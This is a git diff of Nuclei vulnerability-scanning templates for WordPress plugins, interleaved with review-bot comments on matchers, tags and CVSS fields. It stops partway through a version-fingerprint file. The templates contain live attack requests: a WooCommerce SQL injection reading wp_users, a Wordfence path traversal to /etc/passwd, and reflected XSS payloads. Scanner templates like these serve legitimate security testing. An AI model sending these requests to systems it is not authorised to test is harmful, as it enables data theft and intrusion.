diff --git a/poc/wordpress/wordpress-woocommerce-listing-11341.yaml b/poc/wordpress/wordpress-woocommerce-listing-11341.yaml new file mode 100644 index 0000000000..300e671075 --- /dev/null +++ b/poc/wordpress/wordpress-woocommerce-listing-11341.yaml @@ -0,0 +1,23 @@ +id: wordpress-woocommerce-listing +info: + name: WordPress Woocommerce Plugin Directory Listing + author: dhiyaneshDK + severity: info + description: Searches for sensitive directories present in the woocommerce wordpress plugin. + reference: + - https://www.exploit-db.com/ghdb/6192 + tags: wordpress,listing,plugin,woocommerce +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/woocommerce/" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml b/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml index 374d2b2e3f..81d422c278 100644 --- a/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml +++ b/poc/wordpress/wordpress-woocommerce-sqli-11342.yaml @@ -3,8 +3,8 @@ info: name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - tags: wordpress,woocommerce,sqli,wp-plugin,injection - reference: + tags: wordpress,woocomernce,sqli,wp-plugin + reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx requests: @@ -18,8 +18,6 @@ requests: words: - 'sqli-test' - 'attribute_counts' - - 'price_range' - - 'term' condition: and - type: word words: diff --git a/poc/wordpress/wordpress-woocommerce-sqli-11345.yaml b/poc/wordpress/wordpress-woocommerce-sqli-11345.yaml deleted file mode 100644 index 711bde6e79..0000000000 --- a/poc/wordpress/wordpress-woocommerce-sqli-11345.yaml +++ /dev/null 
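Review bot: In wordpress-woocommerce-sqli-11342.yaml, changing `reference:` to `reference: |` turns the two URLs into one literal string that still contains the `- ` prefixes, so anything reading the field as a list gets a single malformed entry; keep plain `reference:` followed by the list items. The new tag `woocomernce` is a typo for `woocommerce`, which means tag-based selection no longer finds this template. The second hunk drops `'price_range'` and `'term'` from the `and` word matcher, leaving `'sqli-test'` and `'attribute_counts'`; the matcher block starts outside the hunk, but requiring fewer words makes a false positive on an unrelated JSON response more likely. The same `reference: |` form is introduced in the new wordpress-wordfence-lfi-11346.yaml.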
@@ -1,44 +0,0 @@ -id: wordpress-woocommerce-sqli - -info: - name: Woocommerce Unauthenticated SQL Injection - author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot - severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. - tags: wordpress,woocommerce,sqli,wp-plugin,injection - reference: - - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: - cwe-id: CWE-89 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - - matchers-condition: and - matchers: - - type: word - words: - - 'sqli-test' - - 'attribute_counts' - - 'price_range' - - 'term' - condition: and - - - type: word - words: - - 'application/json' - part: header - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/wordpress/wordpress-woosidebars.yaml b/poc/wordpress/wordpress-woosidebars.yaml deleted file mode 100644 index 70a6912ff6..0000000000 
--- a/poc/wordpress/wordpress-woosidebars.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: wordpress-woosidebars - -info: - name: WooSidebars Detection - author: ricardomaia - severity: info - reference: - - https://wordpress.org/plugins/woosidebars/ - metadata: - plugin_namespace: woosidebars - wpscan: https://wpscan.com/plugin/woosidebars - tags: tech,wordpress,wp-plugin,top-200 - -requests: - - method: GET - - path: - - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" - - payloads: - last_version: helpers/wordpress/plugins/woosidebars.txt - - extractors: - - type: regex - part: body - internal: true - name: internal_detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - - type: regex - part: body - name: detected_version - group: 1 - regex: - - '(?i)Stable.tag:\s?([\w.]+)' - - matchers-condition: or - matchers: - - type: dsl - name: "outdated_version" - dsl: - - compare_versions(internal_detected_version, concat("< ", last_version)) - - - type: regex - part: body - regex: - - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/poc/wordpress/wordpress-wordfence-lfi-11346.yaml b/poc/wordpress/wordpress-wordfence-lfi-11346.yaml new file mode 100644 index 0000000000..a7d8606021 --- /dev/null +++ b/poc/wordpress/wordpress-wordfence-lfi-11346.yaml @@ -0,0 +1,21 @@ +id: wordpress-wordfence-lfi +info: + name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure + author: 0x_Akoko + severity: high + reference: | + - https://www.exploit-db.com/exploits/48061 + - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ + tags: wordpress,wp-plugin,lfi,wordfence +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 
diff --git a/poc/wordpress/wordpress-wordfence-lfi-11348.yaml b/poc/wordpress/wordpress-wordfence-lfi-11348.yaml index 3fdc257d5c..c716a16c18 100644 --- a/poc/wordpress/wordpress-wordfence-lfi-11348.yaml +++ b/poc/wordpress/wordpress-wordfence-lfi-11348.yaml @@ -1,6 +1,6 @@ id: wordpress-wordfence-lfi info: - name: Wordpress Wordfence 7.4.5 - Arbitrary File Retrieval + name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure author: 0x_Akoko severity: high reference: @@ -15,7 +15,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" - type: status status: - 200 diff --git a/poc/wordpress/wordpress-wordfence-lfi-11350.yaml b/poc/wordpress/wordpress-wordfence-lfi-11350.yaml deleted file mode 100644 index c716a16c18..0000000000 --- a/poc/wordpress/wordpress-wordfence-lfi-11350.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wordpress-wordfence-lfi -info: - name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure - author: 0x_Akoko - severity: high - reference: - - https://www.exploit-db.com/exploits/48061 - - https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/ - tags: wordpress,wp-plugin,lfi,wordfence -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml index d87d24ddb6..884e9b2f03 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml 
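Review bot: The second wordpress-wordfence-lfi-11348.yaml hunk loosens the passwd matcher from `"root:.*:0:0:"` to `"root:.*:0:0"`, and with the greedy `.*` and no closing colon the pattern also accepts text where `0:0` is only a prefix of a longer field. That makes the confirmation less specific for no visible gain, so keep `- "root:.*:0:0:"`. The first hunk replaces the descriptive title with `Wordpress Plugin wordfence.7.4.5 - Local File Disclosure`, which reads like a file name in a report; the previous name was clearer.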
@@ -1,39 +1,24 @@ id: wordpress-wordfence-waf-bypass-xss - info: - name: Wordpress Wordfence - Cross-Site Scripting author: hackergautam + name: Wordfence WAF Bypass WordPress XSS + reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium - description: Wordpress Wordfence is vulnerable to cross-site scripting. - reference: - - https://twitter.com/naglinagli/status/1382082473744564226 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 - tags: wordpress,wordfence,xss,bypass - -http: + tags: wordpress,wordfence,xss +requests: - method: GET path: - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6" - matchers-condition: and matchers: - type: word words: - <script>alert(document.domain)</script> part: body - - type: word part: header words: - text/html - - type: status status: - 200 - -# digest: 4a0a0047304502203bf332bad88b42bad13753e7b75eb53d71765c488f687a0e4debdee14d9f9abd022100ba222adbe24edb0c96da975357596ae7e3a3b3254eb2fb598e12817108d5638f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml index 6f3cc78548..ef0527d5a1 100644 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml +++ b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml @@ -1,9 +1,10 @@ id: wordpress-wordfence-waf-bypass-xss info: + name: Wordpress Wordfence WAF - Cross-Site Scripting author: hackergautam - name: Wordfence WAF Bypass WordPress XSS - reference: https://twitter.com/naglinagli/status/1382082473744564226 severity: medium + reference: + - https://twitter.com/naglinagli/status/1382082473744564226 tags: wordpress,wordfence,xss,bypass requests: - method: GET 
diff --git a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml b/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml deleted file mode 100644 index ef0527d5a1..0000000000 --- a/poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wordpress-wordfence-waf-bypass-xss -info: - name: Wordpress Wordfence WAF - Cross-Site Scripting - author: hackergautam - severity: medium - reference: - - https://twitter.com/naglinagli/status/1382082473744564226 - tags: wordpress,wordfence,xss,bypass -requests: - - method: GET - path: - - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6" - matchers-condition: and - matchers: - - type: word - words: - - <script>alert(document.domain)</script> - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-wordfence-xss-11359.yaml b/poc/wordpress/wordpress-wordfence-xss-11359.yaml index 5bae09492e..4a9a1ee7e9 100644 --- a/poc/wordpress/wordpress-wordfence-xss-11359.yaml +++ b/poc/wordpress/wordpress-wordfence-xss-11359.yaml @@ -1,13 +1,16 @@ id: wordpress-wordfence-xss + info: name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - tags: wordpress,wp-plugin,xss,wordfence + tags: wordpress,wp-plugin,xss + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: words: - "text/html" part: header + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-workflow-11363.yaml b/poc/wordpress/wordpress-workflow-11363.yaml deleted file mode 100644 index e7ce984db9..0000000000 --- a/poc/wordpress/wordpress-workflow-11363.yaml +++ /dev/null 
@@ -1,14 +0,0 @@ -id: wordpress-workflow -info: - name: Wordpress Security Checks - author: kiblyn11,zomsop82 - description: A simple workflow that runs all wordpress related nuclei templates on a given target. - tags: workflow - -workflows: - - - template: technologies/tech-detect.yaml - matchers: - - name: wordpress - subtemplates: - - tags: wordpress \ No newline at end of file diff --git a/poc/wordpress/wordpress-workflow-11365.yaml b/poc/wordpress/wordpress-workflow-11365.yaml new file mode 100644 index 0000000000..24f7035973 --- /dev/null +++ b/poc/wordpress/wordpress-workflow-11365.yaml 
@@ -0,0 +1,29 @@ +id: wordpress-workflow +info: + name: Wordpress Security Checks + author: foulenzer + description: A simple workflow that runs all wordpress related nuclei templates on a given target. + + # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) + # Old workflows still remains valid, and will be working with all nuclei versions. + +workflows: + + - template: /root/foulenzer-templates/wp-detect.yaml + matchers: + - name: wordpress + subtemplates: + - template: cves/2019/CVE-2019-15858.yaml + - template: cves/2019/CVE-2019-6715.yaml + - template: cves/2019/CVE-2019-9978.yaml + - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml + - template: vulnerabilities/wordpress/sassy-social-share.yaml + - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml + - template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml + - template: vulnerabilities/wordpress/wordpress-db-backup.yaml + - template: vulnerabilities/wordpress/wordpress-debug-log.yaml + - template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml + - template: vulnerabilities/wordpress/wordpress-emergency-script.yaml + - template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml + - template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml + - template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml \ No newline at end of file diff --git a/poc/wordpress/wordpress-workflow.yaml b/poc/wordpress/wordpress-workflow.yaml index 24f7035973..e7ce984db9 100644 --- a/poc/wordpress/wordpress-workflow.yaml +++ b/poc/wordpress/wordpress-workflow.yaml 
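Review bot: `- template: /root/foulenzer-templates/wp-detect.yaml` in the new wordpress-workflow-11365.yaml is an absolute path into one author's home directory, so the detection step presumably fails to load on any other machine and the subtemplates gated behind the `wordpress` matcher never run. Use a path relative to the templates directory, as the wordpress-workflow.yaml hunk in this patch does with `- template: technologies/tech-detect.yaml`. The hard-coded subtemplate list will also drift as templates are added or renamed; `- tags: wordpress` under `subtemplates:` avoids that.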
@@ -1,29 +1,14 @@ id: wordpress-workflow info: name: Wordpress Security Checks - author: foulenzer + author: kiblyn11,zomsop82 description: A simple workflow that runs all wordpress related nuclei templates on a given target. - - # Supported on Nuclei v2.2.0 (https://github.com/projectdiscovery/nuclei/releases/tag/v2.2.0) - # Old workflows still remains valid, and will be working with all nuclei versions. + tags: workflow workflows: - - template: /root/foulenzer-templates/wp-detect.yaml + - template: technologies/tech-detect.yaml matchers: - name: wordpress subtemplates: - - template: cves/2019/CVE-2019-15858.yaml - - template: cves/2019/CVE-2019-6715.yaml - - template: cves/2019/CVE-2019-9978.yaml - - template: vulnerabilities/wordpress/easy-wp-smtp-listing.yaml - - template: vulnerabilities/wordpress/sassy-social-share.yaml - - template: vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml - - template: vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml - - template: vulnerabilities/wordpress/wordpress-db-backup.yaml - - template: vulnerabilities/wordpress/wordpress-debug-log.yaml - - template: vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml - - template: vulnerabilities/wordpress/wordpress-emergency-script.yaml - - template: vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml - - template: vulnerabilities/wordpress/wordpress-wordfence-xss.yaml - - template: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml \ No newline at end of file + - tags: wordpress \ No newline at end of file diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml new file mode 100644 index 0000000000..7e24d990b5 --- /dev/null +++ b/poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml 
@@ -0,0 +1,34 @@ +id: wordpress-wpcourses-info-disclosure + +info: + name: WordPress WP Courses Plugin Information Disclosure + author: dwisiswant0 + severity: high + description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials + tags: wordpress,plugin + + # References: + # - [1] https://www.exploit-db.com/exploits/48910 + # - [2] https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + matchers-condition: and + matchers: + - type: regex + regex: + - "rest_post_invalid_id" + - "\"(guid|title|content|excerpt)\":{\"rendered\":" + condition: or + part: body + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 + - 404 + condition: or \ No newline at end of file diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml deleted file mode 100644 index 4a0d110f9c..0000000000 --- a/poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml +++ /dev/null 
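Review bot: The matchers in the new wordpress-wpcourses-info-disclosure-11369.yaml can report a `severity: high` disclosure on a response that discloses nothing. The regex matcher accepts `"rest_post_invalid_id"` as an alternative to the rendered-field pattern and the status matcher accepts `404`, so an error reply for a missing lesson ID still counts as a hit. If the intent is to confirm exposed course content, require status `200` together with the `"\"(guid|title|content|excerpt)\":{\"rendered\":"` pattern, and report the error-only case separately at a lower severity. The references are kept in YAML comments; moving them to a `reference:` list, as the wordpress-wpcourses-info-disclosure.yaml hunk does, makes them visible to tooling.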
@@ -1,36 +0,0 @@ -id: wordpress-wpcourses-info-disclosure - -info: - name: WordPress WP Courses Plugin Information Disclosure - author: dwisiswant0 - severity: high - description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials - tags: wordpress,plugin - reference: - - https://www.exploit-db.com/exploits/48910 - - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - - matchers-condition: and - matchers: - - type: regex - regex: - - "rest_post_invalid_id" - - "\"(guid|title|content|excerpt)\":{\"rendered\":" - condition: or - part: body - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 - - 404 - condition: or \ No newline at end of file diff --git a/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml b/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml index 129d6c6741..4a0d110f9c 100644 --- a/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml +++ b/poc/wordpress/wordpress-wpcourses-info-disclosure.yaml @@ -1,17 +1,20 @@ id: wordpress-wpcourses-info-disclosure + info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials tags: wordpress,plugin - # References: - # - [1] https://www.exploit-db.com/exploits/48910 - # - [2] https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + reference: + - https://www.exploit-db.com/exploits/48910 + - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + matchers-condition: and matchers: - type: regex 
@@ -20,12 +23,14 @@ requests: - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or part: body + - type: word words: - "application/json" part: header + - type: status status: - 200 - 404 - condition: or + condition: or \ No newline at end of file diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml deleted file mode 100644 index 612495b0a8..0000000000 --- a/poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-xmlrpc-listmethods -info: - name: Wordpress XML-RPC List System Methods - author: 0ut0fb4nd - severity: info - tags: wordpress -requests: - - method: POST - path: - - "{{BaseURL}}/xmlrpc.php" - body: "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "system.multicall" - - "system.listMethods" - - "demo.sayHello" - condition: and - part: body diff --git a/poc/wordpress/wordpress-xmlrpc-listmethods.yaml b/poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml similarity index 100% rename from poc/wordpress/wordpress-xmlrpc-listmethods.yaml rename to poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml diff --git a/poc/wordpress/wordpress-zebra-form-xss-11378.yaml b/poc/wordpress/wordpress-zebra-form-xss-11378.yaml deleted file mode 100644 index a36ec88196..0000000000 --- a/poc/wordpress/wordpress-zebra-form-xss-11378.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: wordpress-zebra-form-xss -info: - name: Wordpress Zebra Form XSS - author: madrobot - severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - tags: wordpress,xss -requests: - - raw: - - | - POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate - Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 - Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 - - -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" - Content-Type: text/plain - Test - -----------------------------77916619616724262872902741074-- - matchers-condition: and - matchers: - - type: word - words: - - "</script><img src onerror=alert(/XSS-form/)>" - part: body - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header diff --git a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml new file mode 100644 index 0000000000..eb070bb0f2 --- /dev/null +++ b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml 
@@ -0,0 +1,38 @@
+id: wordpress-zebra-form-xss
+
+info:
+ name: Wordpress Zebra Form XSS
+ author: madrobot
+ severity: medium
+ reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
+ tags: wordpress,xss
+requests:
+ - raw:
+ - |
+ POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
+ Origin: null
+
+ -----------------------------77916619616724262872902741074
+ Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
+ Content-Type: text/plain
+ Test
+ -----------------------------77916619616724262872902741074--
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "</script><img src onerror=alert(/XSS-form/)>"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-zebra-form-xss.yaml b/poc/wordpress/wordpress-zebra-form-xss.yaml
index eb070bb0f2..55d8de29c4 100644
--- a/poc/wordpress/wordpress-zebra-form-xss.yaml
+++ b/poc/wordpress/wordpress-zebra-form-xss.yaml
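Review bot: The new file `poc/wordpress/wordpress-zebra-form-xss-11379.yaml` reuses the id `wordpress-zebra-form-xss` that `wordpress-zebra-form-xss.yaml` also carries in this commit, but its `tags: wordpress,xss` line lacks the `intrusive` tag the other copy is given, so a scan that excludes intrusive templates by tag would presumably still send this POST. If the numbered copy has to stay, I would change the line to `tags: wordpress,xss,intrusive`; otherwise dropping the file avoids two templates reporting under one id. Separately, the multipart part has no empty line between `Content-Type: text/plain` and `Test`, so the part body is not delimited the way multipart/form-data requires. Whether the target's parser tolerates that cannot be seen from here, but it is a likely source of false negatives.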
@@ -1,15 +1,26 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html - tags: wordpress,xss -requests: + description: | + Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php. + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 + metadata: + max-request: 1 + tags: wordpress,xss,wp,wpscan,intrusive + +http: - raw: - | - POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 + POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 
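Review bot: The added `cvss-metrics` vector uses `PR:L`, yet the request lines visible in this hunk carry no cookie or credential, which suggests the endpoint is reached without authentication. If that holds, the classification should read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` with `cvss-score: 6.1`, otherwise triage that sorts on the score will under-rank the finding. The new description also presents the library as used by several plugins while the path probes only the copy under `wp-ticket`, so I would append a sentence such as `This template only checks the copy bundled with the wp-ticket plugin.` so that a clean result is not read as covering other plugins. The raw request block continues outside this hunk.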
@@ -24,15 +35,17 @@ requests: matchers-condition: and matchers: - type: word - words: - - "</script><img src onerror=alert(/XSS-form/)>" part: body + words: + - "</script><img src onerror=alert(document.domain)>" + + - type: word + part: header + words: + - "text/html" - type: status status: - 200 - - type: word - words: - - "text/html" - part: header \ No newline at end of file +# digest: 4a0a00473045022100c03ef41c0ba961c72164701241b78da8d638eb78bb78c0169c5e649bdc9945b80220262a4dc87375607046a19c874994d591e04ead2b1f9e34a1ba678283b1f70eb1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress.yaml b/poc/wordpress/wordpress.yaml new file mode 100644 index 0000000000..9202790171 --- /dev/null +++ b/poc/wordpress/wordpress.yaml 
@@ -0,0 +1,52062 @@ +id: wordpress +info: + name: wordpress_version_fingerprint + severity: info + author: glatisant & erwan +requests: + - method: GET + path: + - "{{BaseURL}}/readme.html" + matchers: + - type: dsl + name: 4.7.8 - 4.9.4 + dsl: + - "(\"092b5391da31c6e8bb02bf4bc03b6b34\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.7 + dsl: + - "(\"fe8cf5b25298130f1b2ed912a5809e33\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.8 + dsl: + - "(\"21b68e053d312980ee29e34e2d2a5946\" == md5(body))" + - type: dsl + name: 4.6.6 + dsl: + - "(\"8e9f725564294e07c64765188bf9a3fe\" == md5(body))" + - type: dsl + name: 4.6.5 + dsl: + - "(\"85889315124967dba655231bed63ca66\" == md5(body))" + - type: dsl + name: 4.6.4 + dsl: + - "(\"444385c242de092b106ddce230ed2626\" == md5(body))" + - type: dsl + name: 4.6.3 + dsl: + - "(\"997cfaa41d14c329574ab63128a6d8ef\" == md5(body))" + - type: dsl + name: 4.6.2 + dsl: + - "(\"43c6fcf7a5e24ed469e6ff13b03fe7a3\" == md5(body))" + - type: dsl + name: 4.6.1 + dsl: + - "(\"df0f4d66b59b3338a5d012d52bc435fa\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"67ba56403014102858d999ee1667524f\" == md5(body))" + - type: dsl + name: 4.5.9 + dsl: + - "(\"3393eb4e7d645b2a0a31d3b6f5f7c9dd\" == md5(body))" + - type: dsl + name: 4.5.8 + dsl: + - "(\"66a213aad3146927db0f82bc5d460622\" == md5(body))" + - type: dsl + name: 4.5.7 + dsl: + - "(\"1a347a939012e6013e52dd80329db99d\" == md5(body))" + - type: dsl + name: 4.5.6 + dsl: + - "(\"49e8cd983673db23788eab8cfd68b6ce\" == md5(body))" + - type: dsl + name: 4.5.5 + dsl: + - "(\"34945973736fe4690ad8bfd98e6536e0\" == md5(body))" + - type: dsl + name: 4.5.4 + dsl: + - "(\"03f530e9ec1ab1735e062d38149ff4ab\" == md5(body))" + - type: dsl + name: 4.5.3 + dsl: + - "(\"29c8aa59c025e67a8ac1d7a2270859ae\" == md5(body))" + - type: dsl + name: 4.5.2 + dsl: + - "(\"51ddc54e156a2eb1178dde690701afe3\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.11 + dsl: + - 